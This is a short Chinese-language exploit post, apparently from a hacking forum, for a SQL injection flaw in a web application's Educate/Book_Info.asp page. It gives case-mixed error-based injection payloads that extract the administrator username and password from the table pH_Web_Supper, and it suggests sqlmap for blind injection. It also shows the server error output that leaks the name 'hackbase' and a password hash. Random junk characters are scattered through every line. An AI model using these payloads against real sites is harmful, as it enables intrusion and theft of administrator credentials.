漏洞出现在Educate/Book_Info.asp 2 Z+ A4 A/ Q2 ?) Y: J
* A, _7 O1 J1 N+ s# n
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
: m% f1 ?* ?8 r 9 Q8 `# J- l4 |
exp:如下8 w8 U4 t" b3 a h7 `0 P
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
' f4 r& X: _0 B$ L查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; A* S, v2 y) Z& E1 V
4 m A7 g: [3 [4 b0 ahttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
6 J' m8 I1 }! j9 z2 t6 y9 _, a : i6 `, L4 I& i
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; J g. {8 _$ l7 W9 ~6 ^7 A
& b+ G! T; X; F1 Y) O3 E
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。0 W5 t; C* w6 N" V/ a4 q2 S
: d4 Z+ d' F/ b/ o/Educate/Book_Info.asp,行 80 N) b0 s: z" t& T
7 T' z$ B2 s: ~5 w1 {/ E( h# K& zhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)/ M$ F! q8 ?7 F: a0 l" m: f
; i' v6 T, l* w7 Q' Q
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
; ?) w4 }0 C9 J& O) y6 j
A4 J6 t: a a/ E( Y2 A j将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ b" T$ d5 `- O/ ~- x# y( ?8 A6 e
& {& L, e9 e j: p1 `1 D8 P/Educate/Book_Info.asp,行 8
G% z/ L: _9 m3 c6 } |